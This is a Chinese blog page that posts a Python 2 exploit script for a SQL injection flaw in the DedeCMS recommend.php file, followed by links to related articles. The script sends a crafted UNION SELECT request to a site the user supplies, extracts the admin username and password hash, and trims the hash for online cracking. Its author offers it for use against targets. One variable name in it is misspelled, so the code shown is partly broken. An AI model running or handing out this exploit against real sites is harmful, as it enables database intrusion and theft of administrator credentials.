dedecms recommend 注入 exp

时间:2022-08-27 09:50:17

我看没人用python写过发过 所以我就发一下
喜欢用python的就用我这个吧 不喜欢的就用JAR那个或者PHP那个吧

  1. #coding:GBK
  2. import  re
  3. import urllib
  4. """
  5. dedecms recommend 注入 exp
  6. by ziwen Q504824480
  7. f4ck team
  8. v5ae team
  9. guest team
  10. """
  11. def md5chuli(md5):
  12. clhmd5=""
  13. md5len=len(md5)
  14. if md5len==32:
  15. clhmd=md5[6:25]
  16. clhmd5=clhmd[3:24]
  17. return clhmd5
  18. error=[]
  19. target=""
  20. target=raw_input("输入目标 要带有http哦!")
  21. b=r".+\..+\..+"
  22. d=re.findall(b,target)
  23. if d==error:
  24. print "你输入的是链接么?"
  25. exit()
  26. else:
  27. print "start fuck"
  28. target2=target+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878"
  29. print target2
  30. url=urllib.urlopen(target2)
  31. page=url.read()
  32. print page
  33. pipei=r"<h2>|(.+)|.+|</h2>"
  34. print re.findall(pipei,page)
  35. pipeimd5=r"<h2>|.+|(.+)|</h2>"
  36. targetmd5=re.findall(pipeimd5,page)
  37. print md5chuli(rargetmd5)
  38. print "上面即为账号和密码其中之一组 MD5已经处理过 可以直接拿去各大MD5站进行解密"
  39. print "如果上面什么也没输出来 说明该站没此漏洞"

dedecms recommend 注入 exp的更多相关文章

  1. 最新 DEDECMS SQL 注入 0day

    4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用 ...

  2. 实验吧——加了料的报错注入&lpar;exp报错注入&rpar;

    题目地址:http://ctf5.shiyanbar.com/web/baocuo/index.php 先查看页面源码得到提示知道了后台执行的sql语句,很常规的查询 测试了一个报错函数发现如下回显, ...

  3. Discuz&excl; 7&period;2 SQL注入exp

    已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个. 参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷. ...

  4. 74cms 注入exp

    遇到就瞎写了一个: #!/usr/bin/env python #encoding:utf-8 #by i3ekr import requests,optparse,re parse = optpar ...

  5. DedeCMS全版本通杀SQL注入漏洞利用代码

    EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000u ...

  6. DedeCMS全版本通杀SQL注入漏洞利用代码及工具

    dedecms即织梦(PHP开源网站内容管理系统).织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友 ...

  7. Dedecms v5&period;7 最新注入分析

    该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php.存在问题的代码: view source 01 ... 02 if($comtype == 'comments') 0 ...

  8. DEDECMS 5&period;7之前版本远程SQL注入漏洞

    2012/4/29 凌晨 知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day,官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且ded ...

  9. 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总

    SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article ...

随机推荐

  1. Linux 安装Mono环境 运行ASP&period;NET(二)

    一.安装libgdiplus     前面我们已经安装了apr.apr_util.pcre和httpd apache .现在我们来安装libgdiplus Libgdiplus是一个Mono库,用于对 ...

  2. Nuget安装nupkg文件

    问题描述: VS出现故障不能使用Manage NuGet Package自动下载安装DLL 解决方案: 直接官网下载相关需要的DLL 在VS中使用console加载本地下载的包安装 控制台code参考 ...

  3. angular4&period;0快速import依赖路径

    快捷键:ALT + ENTER 直接import对应的依赖路径

  4. centos7&plus;ansible自动化工具使用

    一.基础介绍 ========================================================================================== 1. ...

  5. Yii框架中使用mongodb扩展

    前提条件:安装了mongodb数据库 安装了mongo的php驱动 下载Yii的mongo扩展:这是YiiMongoDbSuite的1.3.6版本支持PHP Mongo驱动的版本为1.0.5及以下 下 ...

  6. 买了本Delphi面向对象编程思想,正在看,产生些问题。

    1:第33页说,Delphi通过调用类的一个构造函数来建立一个对象的实例,对象至少有一个create()的构造函数,使用时候写MyObject:=TmyObject.create即可.   但是第37 ...

  7. 手机不弹toast解决方法

    经常遇到华为手机不弹toast的问题     华为手机--设置--通知栏和状态栏--通知中心--自己的项目  用户可能允许通知关了 就收不到提示了     在手机的设置 -> (某些手机前面可能 ...

  8. 【C&plus;&plus;】cout未刷新缓冲区仍会输出的问题

    众所周知,cout是一个流对象,管理一个缓冲区.当使用<<操作符输出字符串时,字符串不是直接被输出到屏幕上,而是首先被插入到该流的缓存(buffer)中.而只有当缓冲区被刷新时,字符串才会 ...

  9. mySQl数据库中不能插入中文的处理办法

    1. 修改MySQL安装目录下(C:\Program Files\MySQL\MySQL Server 5.5)的my.ini文件 设置: default-character-set=utf8 cha ...

  10. 国内外三个领域巨头告诉你Redis怎么用

    随着数据体积的激增,MySQL+memcache已经满足不了大型互联网类应用的需求,许多机构也纷纷选择Redis作为其架构上的补充.这里我们将为大家分享社交巨头新浪微博.传媒巨头Viacom及图片分享 ...

相关文章